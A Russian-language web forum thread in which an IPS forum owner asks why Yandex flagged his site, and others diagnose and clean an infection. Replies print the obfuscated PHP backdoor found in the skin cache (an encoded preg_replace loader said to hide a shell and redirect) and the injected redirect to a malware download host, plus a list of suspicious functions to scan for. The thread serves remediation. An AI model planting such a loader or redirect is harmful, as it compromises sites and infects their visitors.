Jump to content
Дизайн и модификация IPS Community IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
Karagor

Яндекс обнаружил вредоносный код на форуме

Recommended Posts

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Share this post


Link to post
Share on other sites

В последнее время часто наблюдаю взломы подобного типа. Прямо на днях пришлось лечить один форум, а некоторые форумы тех поддержки так и сидят в серпе с этой заразой (привет товарищам с сайт нарушает авторские права).

Есть предположение что связано это с последней найденной уязвимостью (sql-injection). Предположение основано на том, что там стояла версия 3.4.5 потом делалось обновление на 3.4.7 со всеми патчами безопасности, после чего обнаружился вирус.

 

Вредоносный код сидит в /cache/skin_cache/cache_%id/skin_global.php, метод includeJS и имеет подобный вид:

 

$pk='MD5 HASH';
$rsa='o/2`B3b2go0viFoy@FoBP:UJP#`82|JGar<sj#`zK:a}bz=D2]J8r#|v2r=DyAuU2EU(oA&(K*FU2r=Qb:kCr#|AyzJAyAyge*U5P:U@P#L/a}J`ysP/yses>9f(j[}(anT(y[=`F*uUr}%_Z}&bP,%!rEU(araTb*Tn;r=`=t&"a:|tb#&`K,=Dy`JAb[<LeAuUr}%_Z}&bP,%!rEU(KRgUFR}fy,P`a}JW;r&t2*usp#P/F,LGy:`UarP$;[PTF#L$y#L}ys%$o]k8a:|vp#Us>*&"ZD|E|U|E]AFp|k&<r}|R&|P"<ZFkR`<srEU5P:;J<,%Tys=`r[|Ab*uUr}=kZ`akZ`gsEk&ZZkJE&ZakZU|EP}D(jA&t_ZfUa`gs2:JGF*FFjA&A_Z%Qyz|sr#}TF:=@K*ytb:`#a|Q8;#JW":F/b#Fga|Q8",`T2:J/r*C$;z`8aACtb#}$o]k8a:|vr*CAFrLA;]}nb:|Ar*CAFrLn;]`UF|Q8":aT;#|nb#J!r*C$2]CGF:ksyzkWr*C$F:`8or|AbkQ8":P(FkQ8b,Ut2EygP:e(",QU;GDJP[<8;#$sjA&@_E&"ZD|E|U|E]AFp|k&<rDT_Z}<srRgU;tDUF:T(yAD6yT!Bv[Y6y#|DF:`8a[=bP#=/b#W(a|J(a*FFjA&s_E&n>nFGar=G2]J8r#`UPGgUaRDU;nvsb:k8a}J(a*y5P:<Ja]}QF,U@PkJR&|P]&|PbPDTZ|k%"]kJ=R}@srEU52];@a]}QF,U@PkJ9RDJ>EZ|bP:|FKE`52];@2r=Gar<@PkJ,&|&bP#`Q;s;srEUzPnuTa]}QF,U@PkJ,&|&bP#ysrEU(Pn;@p]|Wy,&CK*&"<DJ_ED`k]A&srEU(KrW(anuU;GDJP:u(o#`zK*&UKr=`F:=/b#W(aEuUaEQsa]vs>,&(b]Z@KEgG=tfQe*U5P:DJy[|ny[&AK:}U=EuU2*Uge*QvKRWQyz`8F*una:JtF]}`bs<8b:Jt;r&(b#vJP#TDF,f0>AJz2]L`y[&/yzZGet-8;#JW>#&/F#Cgb#kU>s%@y9J(a9}5P:}JPAp(j[}`o:`Dj[}(anu@pE&}KE;zP,p(oA&PZ-Pp|-}e>tDn_,=tyz`QF*%Dor%`_EFDarTD>#(TFzkG;[P(y,<sp,=A;GDsoA&D2:`G>RCGar&D2]Csy}gs;zJTyz&"FrPgP}}J>#`8a:|v>s%@y9J(y:P#_rgUF:T(yAD6yT!Bv[Y6yz|s2r=DysUW_zJ}F,%}F*D6yT!Bv[Y6;]CD2Z=T;#T`E:kG2,Dz;]}Qj#yJ2ses_tQ/y#=A2r%D_np5"rDYY.';
$pka='0}9J8<ie?.4m-/Vulk&bI7W+^E>X,GOM5L$`"|vnBTzc%*oFRA2s]@6tqaPUw3[dZ;~DQyfCp{=#jHgS(1rh:YN_)!Kx';
$pkb='61D9uQ_M&;`!Evqg,FRb$<t:/SL?Hz^*7x8lfV4i(hm}BCedTyanWo.j{ZJk#@3~UY"0wcA5I+N2O>s]p%X|G)-P=rK[';
$f='%t%'.substr($rsa,566,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

Сигнатура обфусцированного кода может отличатся в разных случаях. Закадирован в нем шелл и редирект на filestore321.com/download.php?id={$m}.

Деятельность вируса палится по наличию куке lang_id eng после ридеректа на вредоносный сайт - заплатка для предотвращения повторного редиректа.

Проверить на взлом этим вирусом можно перейдя на форум из поисковых систем. Также можно проверить по адресу forum.ru/index.php?ipbv=hash&g=js, если откроется пустая страница значит форум заражен (при первом заходе на форум нужно два раза запросить этот адрес).

 

Основная суть лечения заключается в:

  • Проверка шаблона Глобальные -> includeJS в АЦ. Обновления кеша стилей для удаления вредасного кода из кеша.
  • Обновления форума до актуальной версии или обязательная установка всех патчей безопасности после выхода вашей версии
  • Смена паролей для:
    - всех (!) пользователей имеющих доступ в АЦ
    - базе данных
    - фтп
  • Добавления форума в Яндекс.Вебмастер'е с отправкой запроса на перепроверку в разделе Безопасность (это ускорит повторную проверку форума). Проверка, как правило, длится несколько дней.

Но это не дает гарантий что злоумышленик не оставил шеллы где-то еще в других файлах. Для полного лечения нужно просканировать весь форум специальным сканером шеллов, либо искать вручную вредоносные сигнатуры и функции которые чаще всего используются для составления закладок - eval, assert, base64_decode, preg_replace, etc и анализировать их на предмет вредоносности. Популярным для этих целей является скрипт ai-bolit - www.revisium.com/ai/. Хотя работает он жутко медленно и сканрует все подряд, ранние его версии мне больше нравились.

  • Upvote 9

Share this post


Link to post
Share on other sites

Дополню, яндекс сейчас очень усердно помечает форумы, как зараженные и тд. (А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд). Обычно, при посещении конкретной ветки он орал, страница заражена, а сейчас весь сайт.

  • Upvote 2

Share this post


Link to post
Share on other sites

Ох, спасибо.

Видимо предстоит нешуточный геморрой (((

 

Буду пробовать.

Share this post


Link to post
Share on other sites

Странно, патч не грузится почему-то, хоть я и залогинен под логином с которого покупал форум. Может они еще что-то нашли и делают новый?

Share this post


Link to post
Share on other sites
Странно, патч не грузится почему-то, хоть я и залогинен под логином с которого покупал форум. Может они еще что-то нашли и делают новый?

http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__88545

Ниже еще найдете ссылку на последний патч

  • Upvote 1

Share this post


Link to post
Share on other sites

Дополню, яндекс сейчас очень усердно помечает форумы, как зараженные и тд. (А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд). Обычно, при посещении конкретной ветки он орал, страница заражена, а сейчас весь сайт.

 

И все зараженные страницы видно в веб мастере.

Share this post


Link to post
Share on other sites
А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд

У яндекса конечно бывают глюки, особенно на всякие скрипты контекстной рекламы (учитывая последний фейл google adwords'а откуда долгое время лился трафик на вирусные сайта) и картинок с зараженных сайтов, но в свете последней волны взломов я бы всетаки тщательно проверил форум на взлом.

  • Upvote 1

Share this post


Link to post
Share on other sites

Отчитываюсь:

 

1. Патч поставил

2. Обновил кеш стилей

3. Поменял все пароли

 

На данный момент по запросу sport-horse.pro/index.php?ipbv=hash&g=js вместо пустой страницы выдается страница сайта.

Послал в яндекс запрос на перепроверку сайта.

 

Жду )

Share this post


Link to post
Share on other sites

Да, попытался запустить скрипт айболит, но что-то он вылетает в 504 Gateway Time-out.

Почитал у них на сайте ФАК, пошел запускать через SSH

 

Запустил, ждем-с 55к файлов...

Share this post


Link to post
Share on other sites

По поводу патчей. Желательно ставить не один конкретный, а все имеющиеся. В каждом из них закрыта какая-то уязвимость, какие-то более критические, какие-то нет. А лучше всего обновится до последней версии. Была бы английская версия, можно было скачать пропатченный дистрибутив из клиентцентра.

Share this post


Link to post
Share on other sites

Да, попытался запустить скрипт айболит, но что-то он вылетает в 504 Gateway Time-out.

Из браузера даже не стоит пытаться. Только из ssh. Скрипт нужно сконфигурировать чтобы сканировал только php файлы.

Share this post


Link to post
Share on other sites

На данный момент кончилась лицензия, а по новому курсу платить за продление пока не решаюсь.

 

А патчи не накопительные разве?

Но я вообще-то ставил все, кроме последнего.

Share this post


Link to post
Share on other sites
А патчи не накопительные разве?

Накопительные - это версии. А патчи устраняют найденную в определенный момент времени конкретную проблему.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...